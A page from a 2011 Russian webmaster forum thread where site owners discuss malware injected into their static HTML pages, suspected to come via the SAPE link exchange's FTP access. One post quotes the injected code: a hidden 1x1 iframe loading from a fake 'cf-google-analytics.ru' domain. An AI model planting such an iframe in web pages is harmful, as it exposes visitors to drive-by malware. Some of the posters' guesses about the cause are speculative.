Вирусный код в html-коде всех страниц. Не от САПЫ ли? вред: CG-GOOGLE-ANALYTICS.ru - Страница 4

Дмитрий Обзоров · 30.09.2011, 04:14

Цитата:

Сообщение от Салоед

Вот такая вот фигня на страничке появляется:

<iframe frameborder=0 height=1 width=1 scrolling=no src='http://a.cf-google-analytics.ru/main.php?page=09607b3072273d90'> </iframe>

я как топикстартер подтверждаю, у меня такой же код был. Только хочу еще добавить, что код обнаружился вечером, и тогда он был закодирован и был очень длинным и непонятным. А утром принялся за очистку сайта - код уже был таким вот. Закодированный код тоже был в тегах 

Добавлено через 19 минут
жду пока Яндекс снимет в поиске пометку что мой сайт опасен. после этого новый пароль к хостингу засвечу в настройках на сапе, проведу следственный эксперимент.
пока что новый пароль нигде не указывал и сайт не заражается.

заразны были все файлы html-сайта. но и на всех страницах есть теги сапы, в которых вставляется ссылка. ссылки продавались не со всех страниц.

Цитата:

Сообщение от Последний Герой

тогда как объяснить

???

элементарно. открывается хтмл-страничка из компа через фронт пейдж, при открытии подгружается вирусный файл, вирус палит что страничка на компе и как-то маскирует все содержимое хтмл-кода, которое находится в тегах  КАК оно это делает - был бы программистом, были б варианты. Но то что я открываю один и тот же файл с компа и с инетом вредоносный код во фронт пейдже не виден а без инета виден - это факт. НО также еще и не видны ссылки САПЕ. вот ответ и на вопрос:

Цитата:

Насколько я понял, с блоками Сапе вирус непосредственно не связан, раз идет после </body>

как-то все таки связан, если и то и другое не было видно. возможно связан тегом вида 

Еще раз повторю, я говорю о скачанных с инета уже зараженных файлах.

Цитата:

Сообщение от Салоед

Уже два раза удалял на всех сайтах. Код появляется снова, но не сразу. Через десять-тридцать минут. И пока что не на всех страницах.

Салоед, а при смене пароля вы новый пароль указывали в настройках Сапы?

Салоед · 30.09.2011, 04:19

Да. Указывал.

Я вот что понять не могу: почему заразились старые сайты, а тот, который торгует в сапе лишь месяц - чистый... Может есть какая-то связь с последней вирусной атакой на сапу (она была как раз около месяца назад)?

Последний Герой · 30.09.2011, 04:21

Цитата:

Сообщение от Дмитрий Обзоров

элементарно. открывается хтмл-страничка из компа через фронт пейдж, при открытии подгружается вирусный файл

в текстовом редакторе это просто текст, а не исполняемый код, ничего подгружаться не должно, если ранее не было.

Цитата:

Сообщение от Дмитрий Обзоров

Но то что я открываю один и тот же файл с компа и с инетом вредоносный код во фронт пейдже не виден а без инета виден - это факт

В блокноте надо попробовать.
Сразу возникает вопрос, а фронтпейдж Вы купили или украли?

Добавлено через 41 секунду

Цитата:

Сообщение от Салоед

Да. Указывал.

Надо сменить пароль и не указывать, если думаете на сапу.

Дмитрий Обзоров · 30.09.2011, 04:54

Цитата:

в текстовом редакторе это просто текст, а не исполняемый код, ничего подгружаться не должно, если ранее не было.

где я писал про текстовый редактор?

Добавлено через 3 минуты

Цитата:

Сразу возникает вопрос, а фронтпейдж Вы купили или украли?

купил, лет десять назад на базаре гривен за 8, вместе со всем Офисом, с гордой припиской Service Pack 1 MUI.

А что?

sin · 30.09.2011, 04:57

Возможно, это действительно какая-то массовая атака, но ее связь с Сапой и с роботом ФТП мне совсем не очевидна. Иначе как объяснить тот факт, что вирус попадал на одни сайты и обходил другие (из подключенных по ФТП)? ЕСли бы через робота, скорее всего были бы все подряд, по очереди фтп-коннекта. У меня, кстати, тоже есть сайт, подключенный по ФТП. Щас перелопатил страницы - все ОК, вирусов нет, новые ссылки размещены буквально пару часов назад.

Дмитрий Обзоров · 30.09.2011, 05:00

Цитата:

Сообщение от Салоед

Да. Указывал.

Я вот что понять не могу: почему заразились старые сайты, а тот, который торгует в сапе лишь месяц - чистый... Может есть какая-то связь с последней вирусной атакой на сапу (она была как раз около месяца назад)?

а я не указывал и сайт остается чистым.
в общем, лично для меня вопрос риторический, откуда вирус. выжду какое-то время, пока вручную ссылки буду менять, благо не миллион страниц и всего 40 ссылок.

Салоед · 30.09.2011, 05:02

Ладно. Время спать. Снова залил чистые файлы, завтра будет видно.

Спасибо всем тем, кто небезразличен. Сапа - наша кормилица!

MonAmur · 30.09.2011, 05:34

Цитата:

Сообщение от Последний Герой

а фронтпейдж Вы купили или украли?

Цитата:

Сообщение от Дмитрий Обзоров

купил, лет десять назад на базаре гривен за 8, вместе со всем Офисом, с гордой припиской Service Pack 1 MUI

давно так не смеялся

Дмитрий Обзоров, а хостер кто?

Дмитрий Обзоров · 30.09.2011, 05:46

тутхост уа

vss18 · 30.09.2011, 09:17

На нескольких статичных сайтах перезаписался htaccess плюс в корне появился некий странный файл с расширением .zip. HTML-файлы еще не проверял.

30.09.2011, 04:19	#32
Салоед Специалист Регистрация: 15.10.2010 Сообщений: 462 Вес репутации: 187	Да. Указывал. Я вот что понять не могу: почему заразились старые сайты, а тот, который торгует в сапе лишь месяц - чистый... Может есть какая-то связь с последней вирусной атакой на сапу (она была как раз около месяца назад)? Последний раз редактировалось Салоед; 30.09.2011 в 04:24.

30.09.2011, 04:57	#35
sin Модератор Регистрация: 29.10.2007 Сообщений: 1,313 Вес репутации: 240	Возможно, это действительно какая-то массовая атака, но ее связь с Сапой и с роботом ФТП мне совсем не очевидна. Иначе как объяснить тот факт, что вирус попадал на одни сайты и обходил другие (из подключенных по ФТП)? ЕСли бы через робота, скорее всего были бы все подряд, по очереди фтп-коннекта. У меня, кстати, тоже есть сайт, подключенный по ФТП. Щас перелопатил страницы - все ОК, вирусов нет, новые ссылки размещены буквально пару часов назад. __________________ @ Подключение к Сапе статических сайтов (в т.ч. бесплатных хостингов) по FTP без скриптов К бирже статей можно подключиться без скриптов, по ФТП (для статики).

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Код google analytics	vasilchenko	Разработка и сопровождение сайтов	3	28.05.2011 22:54
Объединение Google AdSense и Google Analytics	magura888	Google, MSN, Yahoo	10	23.11.2009 23:23
Google Analytics	Bessel	Google, MSN, Yahoo	2	22.05.2008 00:20
Вставка кода сапы в несколько сотен HTML-страниц	leszkin	Курилка	6	15.09.2007 12:52
Google AdSense & Google Analytics	tpnetman	Контекстная реклама	12	20.06.2007 02:36

30.09.2011, 05:02	#37
Салоед Специалист Регистрация: 15.10.2010 Сообщений: 462 Вес репутации: 187	Ладно. Время спать. Снова залил чистые файлы, завтра будет видно. Спасибо всем тем, кто небезразличен. Сапа - наша кормилица!

30.09.2011, 05:46	#39
Дмитрий Обзоров Новичок Регистрация: 25.01.2011 Сообщений: 8 Вес репутации: 0	тутхост уа

30.09.2011, 09:17	#40
vss18 Новичок Регистрация: 27.10.2010 Сообщений: 13 Вес репутации: 0	На нескольких статичных сайтах перезаписался htaccess плюс в корне появился некий странный файл с расширением .zip. HTML-файлы еще не проверял.